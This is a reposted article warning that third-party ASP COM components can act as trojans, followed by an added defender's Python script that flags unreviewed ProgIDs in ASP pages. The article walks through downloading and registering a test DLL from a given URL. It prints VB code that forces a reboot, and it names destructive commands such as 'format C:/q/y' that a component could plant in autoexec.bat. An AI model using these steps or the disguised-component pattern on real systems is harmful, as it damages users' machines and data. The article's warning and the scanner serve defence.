Security issues in ASP components (reposted)

Source: Internet
Author: User
Microsoft's ASP (Active Server Pages) is simple, easy to use, feature-rich and scalable, which has made it a favorite of users and of most network administrators, and it is on track to replace CGI. But I would like to say to you: if you use ASP, your network security is also greatly reduced! Before I go on, please complete the following steps:
1. Download the file "Http://home.gbsource.net/xuankong/dll.zip" and unzip the Test.dll file to "C:\Windows\System" (if you are using NT, please copy it to the corresponding directory);
2. Next, open the "Start/Run" menu and enter the command "regsvr32 test.dll";
3. Copy index.asp from the unzipped package to your server directory (if you are debugging with PWS, "Personal Web Server", you can copy it to "C:\Inetpub\wwwroot"; on NT, please copy it to the corresponding directory);
4. From another machine, browse to index.asp with IE (you will see an error code, but in fact the program has already run). Now go back to your own machine and look: is there an extra file under C:\?! A file called "Xuankong.dat" (in fact, if I wished, your C:\autoexec.bat file could be opened by me and have commands such as "format C:/q/y" or "deltree *.*/y" written into it, and the next time you restart the machine. Hey...... ).
Let's see what's going on. The DLL file you just copied is actually a component I developed using Visual Basic 5.0:
1. Open VB5.0, create a new "ActiveX DLL" project and enter the following code.
Private Declare Function ExitWindowsEx Lib "user32" _
    (ByVal uFlags As Long, ByVal dwReserved As Long) As Long

Sub Xuankong()   ' Please don't add "Private"
    a$ = InputBox("Please enter your name. If your input is ""xuankong""," + Chr(10) + Chr(13) + _
        "a file ""xuankong.dat"" will be generated in your system;" + Chr(10) + Chr(13) + _
        "otherwise your machine may reboot.", "Please enter", "xuankong")
    If a$ = "xuankong" Then
        Open "c:\xuankong.dat" For Append As #1
        Write #1, "My friend, this is a test program for an ASP component"
        Write #1, "hello world! This is a test"
        Write #1, "If you see this file, the test was successful!!!"
    Else
        ExitWindowsEx &H43, 0   ' use the API function to reboot the machine
    End If
    Close #1
End Sub
2. Change the project name to "dll" and the class module name to "test", then build the project's DLL file into the C:\Windows\System directory.
3. Create a new index.asp file and enter the following code.
<% Set Rs = Server.CreateObject("dll.test") %>
<% Set Rs1 = Rs.Xuankong
   Rs1.Execute %>
4. Copy index.asp to your server and debug as described above! Well, how do you feel now that you have finished debugging??? What if someone develops with VC++ or Visual Java (the components developed with them can be more powerful), or changes the VB code above and adds it to some FTP components, e-mail components, HTTP components, chat room components, counter components ... (any component that can do input/output; components that cannot do input/output are limited in their destructive power), and then gives these components a nice name such as "free ..."? Would you not be fooled? (Hehe! Maybe you've already been fooled; everything free in this world is a good thing!!! *^v^*)
The above is the ASP component security issue! In addition, if an author inadvertently leaves a system bug in place when writing an ASP component, it is even harder to find!
Note: This article only represents a personal point of view. The code provided in this article was debugged on Windows 98 with PWS and Visual Basic 5.0. If you run into the problem that the ASP component cannot be compiled, turn off your PWS. If you have any ideas or comments, please e-mail: xuankong@swau.edu.cn.
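
A defender's check for the risk described above, as an added example that is not part of the original article: it scans ASP source for components instantiated through Server.CreateObject or a server-side <object> tag and reports every ProgID that is not on a reviewed allowlist. The allowlist contents, the sample page and the ProgID "Free.Counter" are constructed assumptions; "dll.test" is the article's test component.

```python
import re

# Assumed allowlist of COM ProgIDs the site owner has reviewed (hypothetical values).
APPROVED_PROGIDS = {"adodb.connection", "adodb.recordset", "scripting.dictionary"}

# Server.CreateObject("ProgID") or bare CreateObject("ProgID"); VBScript ignores case.
CREATE_RE = re.compile(r'\b(?:server\s*\.\s*)?createobject\s*\(\s*"([^"]+)"', re.I)
# <object runat="server" progid="..."> also instantiates a component on the server;
# <object> tags without runat=server are client-side and are ignored here.
OBJECT_RE = re.compile(
    r'<object\b(?=[^>]*\brunat\s*=\s*["\']?server)[^>]*\bprogid\s*=\s*["\']?([\w.]+)',
    re.I)

def find_progids(asp_source):
    """Return (line_number, progid) for every component the page instantiates."""
    hits = []
    for lineno, line in enumerate(asp_source.splitlines(), 1):
        # Pasted code often carries typographic quotes; normalise them first.
        code = re.sub("[\u2033\u201c\u201d]", '"', line)
        for rx in (CREATE_RE, OBJECT_RE):
            hits += [(lineno, m.group(1)) for m in rx.finditer(code)]
    return hits

def unapproved(asp_source, approved=APPROVED_PROGIDS):
    """Return the hits whose ProgID has not been reviewed and allowlisted."""
    return [(n, p) for n, p in find_progids(asp_source) if p.lower() not in approved]

# Constructed sample page; line 2 is the article's index.asp call, written with the
# double-prime quotes (U+2033) that pasted copies of the code tend to contain.
SAMPLE = '''<% Set Conn = Server.CreateObject("ADODB.Connection") %>
<% set Rs=server.createobject (\u2033dll.test\u2033)%>
<object runat="server" id="cnt" progid="Free.Counter"></object>
<object classid="clsid:0000" progid="Client.Thing"></object>
'''

if __name__ == "__main__":
    for lineno, progid in unapproved(SAMPLE):
        print(f"line {lineno}: unreviewed component {progid}")
```

Every ProgID it reports is a binary that runs with the web server's privileges, so each one should be traced to its DLL and publisher before it is registered with regsvr32.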


